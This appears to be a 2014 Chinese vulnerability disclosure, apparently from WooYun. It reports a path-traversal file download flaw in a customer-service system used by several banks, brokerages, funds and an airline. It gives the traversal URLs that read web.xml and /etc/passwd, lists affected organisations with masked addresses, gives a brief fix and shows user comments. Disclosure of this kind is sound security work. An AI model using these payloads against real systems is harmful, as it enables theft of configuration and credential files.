某客服服务系统任意文件下载漏洞涉及多家银行、证券、基金、政府（二）

1.漏洞参数filename 这其实是用户在客服系统上传的图片地址。

读取配置文件
 http://x.x.x.x/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml
 读取passwd文件
 http://x.x.x.x//uploadfile?istrade=istrade&filename=../../../../../etc/passwd

http://**.**.**.**:9090/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml

http://**.**.**.**:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd

国金证券
 
 http://**.**.**.**:9090/
 
 国航
 
 **.**.**.**:9090/
 
 吉祥人寿
 
 http://**.**.**.**:9090/
 
 南方基金(有waf)
 
 http://**.**.**.**:9898
 
 安信证券
 
 **.**.**.**:8002/
 
 http://**.**.**.**:9090/
 
 -----------------------------------

更多案例列表：

http://**.**.**.**/casefinance/index.htm

目录权限控制防止采用../方式回溯到上一级目录。

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2014-08-17 13:07

厂商回复：

最新状态：

暂无

1. 2014-08-12 19:15 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   1

   @loli 刷？建议漏洞集合打包！

   1# 回复此人

2. 2014-08-12 19:49 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

   0

   @U神 不要打击人家的积极性，或许人家确实是在努力的挖掘漏洞呢…

   2# 回复此人

3. 2014-08-12 20:02 | 王浩然 ( 路人 | Rank:4 漏洞数:1 | 未知攻，焉知防！)

   0

   标题这么醒目，让我情何以堪！

   3# 回复此人

4. 2014-08-12 20:28 | loli ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

   0

   @U神 刷洞也是看心情的。

   4# 回复此人

5. 2014-08-12 20:30 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   0

   @loli 有时候也是，一找到漏洞就心急，然后提交了，然后审核过了，打算继续挖，结果又挖到漏洞哈

   5# 回复此人

6. 2014-11-10 21:24 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

   1

   厉害！

   6# 回复此人